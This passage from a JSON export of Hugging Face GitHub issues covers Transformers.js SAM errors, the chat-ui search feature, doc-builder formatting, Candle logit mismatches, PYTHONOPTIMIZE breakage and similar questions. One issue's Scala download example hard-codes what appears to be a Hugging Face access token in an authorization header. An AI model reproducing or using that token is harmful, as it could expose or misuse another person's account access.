RawImage.read(img_url);\nconst input_points = [[[340, 250]]] // 2D localization of a window\n\nconst inputs = await processor(raw_image, input_points);\nconst outputs = await model(inputs); /// Error happens here\n\nconst masks = await processor.post_process_masks(outputs.pred_masks, inputs.original_sizes, inputs.reshaped_input_sizes);\nconsole.log(masks); \n// [\n// Tensor {\n// dims: [ 1, 3, 410, 614 ],\n// type: 'bool',\n// data: Uint8Array(755220) [ ... ],\n// size: 755220\n// }\n// ]\nconst scores = outputs.iou_scores;\nconsole.log(scores);\n// Tensor {\n// dims: [ 1, 1, 3 ],\n// type: 'float32',\n// data: Float32Array(3) [\n// 0.8350210189819336,\n// 0.9786665439605713,\n// 0.8379436731338501\n// ],\n// size: 3\n// }\n````\n\n\nMarkup:\n````html\n\n\n \n \n \n\n \n

<!-- (HTML markup largely lost during export; the page just shows a \"SAM DEMO\" heading and loads the script above as an ES module) -->
SAM DEMO
\n\n````\n\n\nCan you maybe give me a hint what the issue is here, or what I need to change (e.g. due to the major version changes)?\n\nThanks so much :-)",
    "url": "https://github.com/huggingface/transformers.js/issues/1323",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-27T20:01:49Z",
    "updated_at": "2025-11-29T12:32:29Z",
    "user": "BernhardBehrendt"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1836,
    "title": "Search feature tasks",
    "body": "We implemented a first version of the search chat feature in  #1823, there's still some todos if people feel like tackling: \n\n- [ ] Right now we only return the N most relevant snippets, we would need to return all matching conversations and implement infinite loading & pagination. The building blocks already exist in `NavMenu.svelte` they need to be ported over.\n- [ ] - It would be nice to show, below the conversation title, a little sample of text which matches the search query, so we can see why it matched, right now we only show the title.",
    "url": "https://github.com/huggingface/chat-ui/issues/1836",
    "state": "closed",
    "labels": [
      "enhancement",
      "help wanted",
      "front",
      "back"
    ],
    "created_at": "2025-05-27T08:17:44Z",
    "updated_at": "2025-06-02T14:30:40Z",
    "comments": 7,
    "user": "nsarrazin"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38396,
    "title": "Can I disable all CI works in my forked version of Transformers?",
    "body": "After I synced the `main` branch of Transformers in my forked version, github keeps running CI works and fails. Can I disable it? Thanks.",
    "url": "https://github.com/huggingface/transformers/issues/38396",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-27T04:44:07Z",
    "updated_at": "2025-05-28T18:06:31Z",
    "comments": 2,
    "user": "ChengLyu"
  },
  {
    "repo": "huggingface/doc-builder",
    "number": 564,
    "title": "How to ignore some line when applying style?",
    "body": "I have this in my code:\n\n```python\nexpected_output = textwrap.dedent(\"\"\"\\\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 Step 42 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\n\u2502 \u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513 \u2502\n\u2502 \u2503 Prompt     \u2503 Completion   \u2503 Correctness \u2503 Format \u2503 \u2502\n\u2502 \u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529 \u2502\n\u2502 \u2502 The sky is \u2502  blue.       \u2502        0.12 \u2502   0.79 \u2502 \u2502\n\u2502 \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524 \u2502\n\u2502 \u2502 The sun is \u2502  in the sky. \u2502        0.46 \u2502   0.10 \u2502 \u2502\n\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f\n\"\"\")\n```\n\nAnd it gets reformatted into this:\n\n```python\nexpected_output = textwrap.dedent(\"\"\"\\\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 Step 42 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e \u2502 \u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2502 \u2502 \u2503 Prompt \u2503 Completion \u2503 Correctness \u2503 Format \u2503 \u2502 \u2502 \u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529 \u2502 \u2502\n\u2502 The sky is \u2502 blue. 
\u2502 0.12 \u2502 0.79 \u2502 \u2502 \u2502 \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524 \u2502 \u2502 \u2502 The sun is\n\u2502 in the sky. \u2502 0.46 \u2502 0.10 \u2502 \u2502 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f\n\"\"\")\n```\n\nis there a way to avoid this?",
    "url": "https://github.com/huggingface/doc-builder/issues/564",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-26T21:58:08Z",
    "updated_at": "2025-05-26T21:59:13Z",
    "user": "qgallouedec"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 609,
    "title": "Properties data",
    "body": "### Feature request\n\nPlease add properties for the content of safetensor files.\n(Which can be read without the requirement to load the whole thing ...)\n\n### Motivation\n\nRename all your safetensor files to a numeric value from 1.safetensors to n.safetensors, where n is the amount of such files you have.\n\nNow try to find out, what is inside, like:\n- Model type (checkpoint, lora, ip-adapter-files, anything else)\n- Application type (SD1, SD2, SD3, SDXL, FLUX, Audio, Video and more)\n- Original name\n- Version\n- and more ...\n\nThe safetensor file is like a package without any description. There's something inside, but you don't have any possibility to see what it is.\n\nWhat users are missing is the package label that tells them, what's inside, like anything in the warehouse. If you go shopping, such a label tells you the name, the producers name, the weight and normally something about the ingredients.\n\nIt would be very useful, if a safetensor package could do this too.\n\n### Your contribution\n\nI just have the idea.\nI don't know how to PR  ...",
    "url": "https://github.com/huggingface/safetensors/issues/609",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-26T20:06:13Z",
    "updated_at": "2025-06-16T12:13:08Z",
    "comments": 2,
    "user": "schoenid"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 660,
    "title": "How to control the number of responses per query for each benchmark?",
    "body": "Hi, thank you for the great work!\nIn the README, I noticed that you mention the use of different numbers of responses per query for estimating pass@1 across benchmarks. For example:\n\nBenchmark | Number of responses per query\n-- | --\nAIME 2024 | 64\nMATH-500 | 4\nGPQA Diamond | 8\nLiveCodeBench | 16\n\nHowever, I'm unable to find where in the code or CLI these values are configured. When running the following example:\n\n```\nNUM_GPUS=1\nMODEL=deepseek-ai/{model_name}\nMODEL_ARGS=\"model_name=$MODEL,dtype=bfloat16,max_model_length=32768,gpu_memory_utilization=0.8,data_parallel_size=$NUM_GPUS,generation_parameters={max_new_tokens:32768,temperature:0.6,top_p:0.95}\"\nOUTPUT_DIR=data/evals/$MODEL\n\nlighteval vllm $MODEL_ARGS \"lighteval|aime24|0|0\" \\\n    --use-chat-template \\\n    --output-dir $OUTPUT_DIR\n```\n\nDoes this automatically sample 64 responses per query for AIME24, as indicated in the table? Or do I need to explicitly specify the number of responses? If so, how can I pass that parameter through the CLI?",
    "url": "https://github.com/huggingface/open-r1/issues/660",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-26T14:38:15Z",
    "updated_at": "2025-05-27T15:32:50Z",
    "user": "Zoeyyao27"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38377,
    "title": "Why are the model classes in unit tests imported directly from the transformer package instead of directly importing the model classes in the file? Is there any special consideration?",
    "body": "### Feature request\n\nTake qwen3MoE unit test as an example:\nif is_torch_available():\n    import torch\n\n    from transformers import (\n        Qwen3MoeForCausalLM,\n        Qwen3MoeForQuestionAnswering,\n        Qwen3MoeForSequenceClassification,\n        Qwen3MoeForTokenClassification,\n        Qwen3MoeModel,\n    )\n\nWhy not this:\nfrom src.transformers.models.qwen3_moe.modeling_qwen3_moe import (\n        Qwen3MoeForCausalLM,\n        Qwen3MoeForQuestionAnswering,\n        Qwen3MoeForSequenceClassification,\n        Qwen3MoeForTokenClassification,\n        Qwen3MoeModel,\n        )\n\n### Motivation\n\nUnit tests should guard their own code files\n\n### Your contribution\n\nNo PR has been submitted yet",
    "url": "https://github.com/huggingface/transformers/issues/38377",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-05-26T11:41:19Z",
    "updated_at": "2025-05-26T11:41:19Z",
    "comments": 0,
    "user": "ENg-122"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38375,
    "title": "Unable to run run_instance_segmentation_no_trainer with HF Accelerate",
    "body": "### System Info\n\nI am trying to run the [examples/pytorch/instance-segmentation/run_instance_segmentation_no_trainer.py](https://github.com/huggingface/transformers/blob/d1b92369ca193da49f9f7ecd01b08ece45c2c9aa/examples/pytorch/instance-segmentation/run_instance_segmentation_no_trainer.py) with HF Accelerate. I was able to run the other Trainer API example successfully, but the No Trainer (Accelerate) version is facing the following bug.\n\nThis is using the `4.52.0.dev0` instance. The only change I've made was to change epochs=2. \n\nThe following error arose, when trying to prompt for more information, ChatGPT suggests it could be the following issues but I have no idea on what could be the root cause. No other related issues found and the docs bot was not working. Would appreciate advice on how to run this example script as I hope to adopt it for my task.\n\n| **Category**                | **Potential Issue**                                                                 | **Explanation**                                                                                             | **Recommended Fix**                                                                                   |\n|----------------------------|--------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------|\n| **Model Config Mismatch**  | Mismatch in `num_labels` vs checkpoint (81 vs 3)                                     | Causes some layers (e.g., `class_predictor`) to be randomly initialized, might desync ranks                 | Set `config.num_labels = 3` **before** loading the model or use a matching checkpoint                 |\n| **DDP Desynchronization**  | Different logic across ranks (e.g., `if rank == 0:` doing extra things)             | All ranks must call collectives in the same order and time                                                  | Ensure logic is **identical** across all ranks                                                         |\n| **Evaluation in DDP**      | Evaluation logic not synchronized                                                   | Can cause hanging during collective ops like `all_gather`                                                   | Skip evaluation for non-zero ranks or use `if rank == 0:` carefully                                   |\n| **GPU Communication**      | NCCL timeout or deadlock due to driver/hardware/GIL issues                          | Long-running or stuck collectives cause watchdog termination                                                | Set env vars: `NCCL_BLOCKING_WAIT=1`, `NCCL_ASYNC_ERROR_HANDLING=1`, and reduce batch size if needed  |\n| **Distributed Setup**      | Improper `accelerate` or `torchrun` configuration                                   | One process might be behaving incorrectly                                                                   | Test with single GPU first: `CUDA_VISIBLE_DEVICES=0 accelerate launch --num_processes=1 ...`          |\n| **Deprecated Args**        | `_max_size` passed to `Mask2FormerImageProcessor`                                   | Harmless, but messy                                                                                         | Remove `_max_size` from processor initialization                                                       |\n| 
**Resource Overload**      | GPU memory, bandwidth, or CPU bottleneck                                            | Can indirectly cause slowdowns or crashes                                                                   | Monitor with `nvidia-smi`, lower batch size, reduce `num_workers`                                     |\n\nError message below:\n```\nloading weights file model.safetensors from cache at /home/jiayi/.cache/huggingface/hub/models--facebook--mask2former-swin-tiny-coco-instance/snapshots/22c4a2f15dc88149b8b8d9f4d42c54431fbd66f6/model.safetensors\nInstantiating SwinBackbone model under default dtype torch.float32.\nAll model checkpoint weights were used when initializing Mask2FormerForUniversalSegmentation.\n\nSome weights of Mask2FormerForUniversalSegmentation were not initialized from the model checkpoint at facebook/mask2former-swin-tiny-coco-instance and are newly initialized because the shapes did not match:\n- class_predictor.bias: found shape torch.Size([81]) in the checkpoint and torch.Size([3]) in the model instantiated\n- class_predictor.weight: found shape torch.Size([81, 256]) in the checkpoint and torch.Size([3, 256]) in the model instantiated\n- criterion.empty_weight: found shape torch.Size([81]) in the checkpoint and torch.Size([3]) in the model instantiated\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\n/raid/jiayi/safety_barrier_breach/mask2former_hf/venv/lib/python",
    "url": "https://github.com/huggingface/transformers/issues/38375",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-26T10:23:04Z",
    "updated_at": "2025-07-05T08:03:07Z",
    "comments": 3,
    "user": "gohjiayi"
  },
  {
    "repo": "huggingface/huggingface_hub",
    "number": 3117,
    "title": "how to download huggingface model files  organize the http header  and  so on  in other language",
    "body": "Hi, \n          I  want to use another language like java or scala to download  huggging face  model and config.json. but  meet connnect error , it is  not make sense . so  I  want to know does huggingface  have some more  setting to download file ?\n\n````\n\npackage torch.tr\n\nimport java.io.FileOutputStream\nimport java.net.URI\nimport java.net.http.{HttpClient, HttpRequest, HttpResponse}\nimport java.time.Duration\n\nobject HuggingFaceDownloader {\n  def main(args: Array[String]): Unit = {\n    val fileUrl = \"https://huggingface.co/codellama/CodeLlama-7b-Instruct-hf/resolve/main/config.json\"\n    val savePath = \"config.json\"\n\n    val headers = Map(\n      \"Accept-Encoding\" -> \"identity\",\n//      \"user-agent\" -> \"transformers/0.0.1;  java/23.0.2+7-58;  hf_hub/null;  java/23.0.2;  file_type/config;  from_autoclass/false;  session_id/1AC306C59B944E9EA06A482682BE9584; unknown/None\",\n      \"authorization\" -> \"Bearer hf_XXAdogOLotfVSVFMKrWXSITeByDgRe\"\n    )\n\n    try {\n      downloadFile(fileUrl, savePath, headers)\n      println(s\"\u6587\u4ef6\u4e0b\u8f7d\u6210\u529f\uff0c\u4fdd\u5b58\u8def\u5f84: $savePath\")\n    } catch {\n      case e: Exception =>\n        System.err.println(s\"\u6587\u4ef6\u4e0b\u8f7d\u5931\u8d25: ${e.getMessage}\")\n        e.printStackTrace()\n    }\n  }\n\n  def downloadFile(fileUrl: String, savePath: String, headers: Map[String, String]): Unit = {\n    val client = HttpClient.newBuilder()\n      .connectTimeout(Duration.ofSeconds(10))\n      .followRedirects(HttpClient.Redirect.NORMAL)\n      .build()\n\n    val requestBuilder = HttpRequest.newBuilder()\n      .uri(URI.create(fileUrl))\n      .GET()\n\n    headers.foreach { case (key, value) =>\n      requestBuilder.header(key, value)\n    }\n\n    val request = requestBuilder.build()\n\n    val response = client.send(request, HttpResponse.BodyHandlers.ofInputStream())\n\n    if (response.statusCode() == 200) {\n      val inputStream = response.body()\n      val outputStream = new FileOutputStream(savePath)\n      try {\n        val buffer = new Array[Byte](4096)\n        var bytesRead = inputStream.read(buffer)\n        while (bytesRead != -1) {\n          outputStream.write(buffer, 0, bytesRead)\n          bytesRead = inputStream.read(buffer)\n        }\n      } finally {\n        inputStream.close()\n        outputStream.close()\n      }\n    } else {\n      throw new Exception(s\"\u4e0b\u8f7d\u5931\u8d25\uff0c\u72b6\u6001\u7801: ${response.statusCode()}\")\n    }\n  }\n}\n\n```\n\n```\npackage dev.transformers4j.transformers;\n\nimport java.io.BufferedInputStream;\nimport java.io.FileOutputStream;\nimport java.io.IOException;\nimport java.net.URL;\n\npublic class HuggingFaceDownloader2 {\n\n    public static void main(String[] args) {\n        String fileUrl = \"https://huggingface.co/codellama/CodeLlama-7b-Instruct-hf/resolve/main/config.json\";\n        String savePath = \"config.json\"; // \u672c\u5730\u4fdd\u5b58\u7684\u6587\u4ef6\u8def\u5f84\n\n        try {\n            downloadFile(fileUrl, savePath);\n            System.out.println(\"\u6587\u4ef6\u4e0b\u8f7d\u6210\u529f\uff0c\u4fdd\u5b58\u8def\u5f84: \" + savePath);\n        } catch (IOException e) {\n            System.err.println(\"\u6587\u4ef6\u4e0b\u8f7d\u5931\u8d25: \" + e.getMessage());\n            e.printStackTrace();\n        }\n    }\n\n    /**\n     * \u4ece\u6307\u5b9a URL \u4e0b\u8f7d\u6587\u4ef6\u5e76\u4fdd\u5b58\u5230\u672c\u5730\u8def\u5f84\n     * @param fileUrl 
\u8981\u4e0b\u8f7d\u7684\u6587\u4ef6\u7684 URL\n     * @param savePath \u672c\u5730\u4fdd\u5b58\u7684\u6587\u4ef6\u8def\u5f84\n     * @throws IOException \u5982\u679c\u5728\u4e0b\u8f7d\u6216\u4fdd\u5b58\u6587\u4ef6\u8fc7\u7a0b\u4e2d\u53d1\u751f I/O \u9519\u8bef\n     */\n    public static void downloadFile(String fileUrl, String savePath) throws IOException {\n        URL url = new URL(fileUrl);\n\n        try (BufferedInputStream in = new BufferedInputStream(url.openStream());\n             FileOutputStream fileOutputStream = new FileOutputStream(savePath)) {\n            System.out.println(\": \" + savePath);\n            byte[] dataBuffer = new byte[1024];\n            int bytesRead;\n            while ((bytesRead = in.read(dataBuffer, 0, 1024)) != -1) {\n                fileOutputStream.write(dataBuffer, 0, bytesRead);\n            }\n        }\n    }\n}\n\n```",
    "url": "https://github.com/huggingface/huggingface_hub/issues/3117",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-26T10:00:25Z",
    "updated_at": "2025-06-15T14:55:48Z",
    "user": "mullerhai"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 510,
    "title": "anyone can run unit 1 dumm agent notebook????",
    "body": "\"Image\"",
    "url": "https://github.com/huggingface/agents-course/issues/510",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-25T03:00:04Z",
    "updated_at": "2025-06-25T09:03:52Z",
    "user": "chaoshun2025"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38346,
    "title": "Why is return_assistant_tokens_mask and continue_final_message incompatible?",
    "body": "I'm currently authoring a new chat template, and while debugging encountered the check for this, however when uncommenting the check, the resulting mask and template both seem to still be correct. So I'm curious as to why or whether this check is needed at all?\n\nI can see it was introduced in [the original PR](https://github.com/huggingface/transformers/pull/33198), however there doesn't seem to be any justification/explanation for this assertion.",
    "url": "https://github.com/huggingface/transformers/issues/38346",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-24T23:44:13Z",
    "updated_at": "2025-07-02T08:03:11Z",
    "comments": 2,
    "user": "nyxkrage"
  },
  {
    "repo": "huggingface/candle",
    "number": 2967,
    "title": "Logit Discrepancy Between Candle and PyTorch When Using XLM-RoBERTa Model",
    "body": "When running the same XLM-RoBERTa model (`s-nlp/xlmr_formality_classifier` - [HF](https://huggingface.co/s-nlp/xlmr_formality_classifier) ) in both Candle and PyTorch, I'm observing significant differences in the logits produced by the model's classification head for identical inputs. Is this expected behavior? See [this repository](https://github.com/jpe90/candle-pytorch-parity-testing/tree/master/xlm-roberta-finetuned) for a reproduction.\n\n## Environment/Setup\n\n- Model: `s-nlp/xlmr_formality_classifier` \n- Candle version: 0.9.1\n- Model SHA256: `66037d963856d6d001f3109d2b3cf95c76bce677947e66f426299c89bc1b58e7`\n- OS: macOS\n\n## Observed Behavior\n\nGiven identical inputs, the logits produced by Candle and PyTorch differ significantly:\n\n**Candle logits:**\n```\n[[2.0820313, -1.7548828], [0.7783203, -0.5629883], [1.2871094, -1.0039063], [2.1601563, -1.9277344]]\n```\n\n**PyTorch logits:**\n```\n[[ 2.6433, -2.3445],\n [ 1.0379, -0.9621],\n [ 1.4154, -1.2704],\n [ 3.4423, -3.1726]]\n```\n\n## Expected Behavior\n\nI would expect the logits to be extremely close (within floating-point precision differences) when running the same model with identical inputs across different frameworks.\n\n## Steps to Reproduce\n\n1. Clone the repository: https://github.com/jpe90/candle-pytorch-parity-testing\n2. Run the PyTorch implementation in `/xlm-roberta-finetuned/pytorch/main.py`\n3. Run the Candle implementation in `/xlm-roberta-finetuned/candle/src/main.rs`\n4. Compare the logits produced by both implementations\n\n## Additional Context\n\n- The tokenization appears to be identical between both implementations (identical token IDs)\n- I checked and made sure model checksums match at runtime\n- Config seems to match ([see here](https://github.com/jpe90/candle-pytorch-parity-testing/blob/master/xlm-roberta-finetuned/troubleshooting.md))\n\n## Questions\n\n1. Should I expect identical (or very close) logits between PyTorch and Candle implementations?\n2. If differences are expected, what is the acceptable range of variation?\n3. Could these differences impact more sensitive applications that rely on logit values rather than just the final classifications?\n4. Are there known issues with XLM-RoBERTa models specifically in Candle?\n",
    "url": "https://github.com/huggingface/candle/issues/2967",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-24T17:24:33Z",
    "updated_at": "2025-05-26T10:45:24Z",
    "comments": 2,
    "user": "jpe90"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11607,
    "title": "with a custom attention processor for Flux.dev, inference time changes when manually load and inject the transformer model into a flux pipeline versus let the flux pipeline constructor load the transformer internally.",
    "body": "With a custom attention processor for Flux.dev transformer, the inference time is different between the following two ways:\n\n1. Manually load and inject the transformer into a flux.dev pipeline\n\n2. Let the pipeline constructor load the transformer internally\n\nThe inference time of the first way is about 15% slower than second way.\nWhat is the reason?\nI built diffusers from the source code.\nAny insights are appreciated!",
    "url": "https://github.com/huggingface/diffusers/issues/11607",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-24T06:42:11Z",
    "updated_at": "2025-05-26T01:27:00Z",
    "comments": 1,
    "user": "LinchuanXuTheSEAAI"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38326,
    "title": "Allow `MllamaModel` to accept `pixel_values` and `inputs_embeds`",
    "body": "### Feature request\n\n`MllamaModel` does not allow users to pass `pixel_values` and `inputs_embeds` simultaneously:\nhttps://github.com/huggingface/transformers/blob/54cd86708d2b63a1f696ee1c59384a2f04100f57/src/transformers/models/mllama/modeling_mllama.py#L1702-L1705\n\nHowever, commenting out those lines and running the follow script does generate the same logits:\n```python\nimport torch\nfrom transformers import MllamaForConditionalGeneration, AutoProcessor\n\n\nmodel_id = \"meta-llama/Llama-3.2-11B-Vision-Instruct\"\nmodel = MllamaForConditionalGeneration.from_pretrained(\n    model_id, device_map=\"auto\", torch_dtype=torch.bfloat16\n)\nprocessor = AutoProcessor.from_pretrained(model_id)\n\nmessages = [\n    [\n        {\n            \"role\": \"user\",\n            \"content\": [\n                {\n                    \"type\": \"image\",\n                    \"url\": \"https://llava-vl.github.io/static/images/view.jpg\",\n                },\n                {\"type\": \"text\", \"text\": \"What does the image show?\"},\n            ],\n        }\n    ],\n]\ninputs = processor.apply_chat_template(\n    messages,\n    add_generation_prompt=True,\n    tokenize=True,\n    return_dict=True,\n    return_tensors=\"pt\",\n).to(model.device)\n\noutputs = model(**inputs)\n\n# Manually compute inputs_embeds\ninput_ids = inputs.pop(\"input_ids\")\ninputs_embeds = model.get_input_embeddings()(input_ids)\nnew_outputs = model(inputs_embeds=inputs_embeds, **inputs)\nassert torch.allclose(outputs.logits, new_outputs.logits)\n```\n\n### Motivation\n\nBeing able to pass `inputs_embeds` along with `pixel_values` enables soft embeddings to be passed to the model in addition to images, which is useful for prompt tuning.\n\n### Your contribution\n\nCould contribute a PR removing the check assuming there isn't something I'm unaware of about the check.",
    "url": "https://github.com/huggingface/transformers/issues/38326",
    "state": "closed",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-05-23T15:26:28Z",
    "updated_at": "2025-05-27T16:33:57Z",
    "comments": 1,
    "user": "dxoigmn"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38323,
    "title": "`PYTHONOPTIMIZE=2` seems not work with `transformers-`based library",
    "body": "### System Info\n\nI am currently having the latest package install.\ntorch 2.6.0+cu124\ntransformers 4.51.3\nsentence-transformers 4.1.0\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nError:\n\n```python\nFile \"\", line 488, in _call_with_frames_removed\n  File \"D:\\Dataset\\AgentAI\\.venv\\Lib\\site-packages\\transformers\\modeling_utils.py\", line 5494, in \n    class SQuADHead(nn.Module):\n    ...<113 lines>...\n                    )\n  File \"D:\\Dataset\\AgentAI\\.venv\\Lib\\site-packages\\transformers\\modeling_utils.py\", line 5513, in SQuADHead\n    @replace_return_docstrings(output_type=SquadHeadOutput, config_class=PretrainedConfig)\n     ~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\Dataset\\AgentAI\\.venv\\Lib\\site-packages\\transformers\\utils\\doc.py\", line 1194, in docstring_decorator\n    lines = func_doc.split(\"\\n\")\n            ^^^^^^^^^^^^^^\nAttributeError: 'NoneType' object has no attribute 'split'\n```\n\nA simple reproduction:\n\n```python\nfrom sentence_transformers import SentenceTransformer\n\nmodel = SentenceTransformer('all-MiniLM-L6-v2')\n\nembedding = model.encode(\"What is the capital of France?\")\nprint(embedding.shape)\n```\n\n### Expected behavior\n\nThis is not actually an issue, but I expect a documentation update from `transformers` maintainer to any end-users who use or develop a `transformers-` based library on the function `replace_return_docstrings` at `src/transformers/utils/doc.py` is to don't strip out the docstring by switching the option `PYTHONOPTIMIZE=2` to reduce the size of the bytecode. The use of `PYTHONOPTIMIZE=1` is OK\n\nThe reason is that the function `replace_return_docstrings` is expecting to be a decorator function without supporting the case of empty docstring. In some case, such as web hosting on Docker or production environment, or hosting an LLM without tool call where we usually strip out the docstring. \n\nIn the reproduction above (my use-case), I am just need to run the RAG search and thus don't need the docstring to be there.",
    "url": "https://github.com/huggingface/transformers/issues/38323",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-23T14:24:34Z",
    "updated_at": "2025-05-26T14:29:17Z",
    "comments": 1,
    "user": "IchiruTake"
  },
  {
    "repo": "huggingface/candle",
    "number": 2965,
    "title": "Are there any support for complex number?",
    "body": "Are there any support for complex number?",
    "url": "https://github.com/huggingface/candle/issues/2965",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-23T09:33:47Z",
    "updated_at": "2025-11-23T22:16:54Z",
    "comments": 1,
    "user": "hndrbrm"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 3586,
    "title": "Where is PartialState._shared_state initialized?",
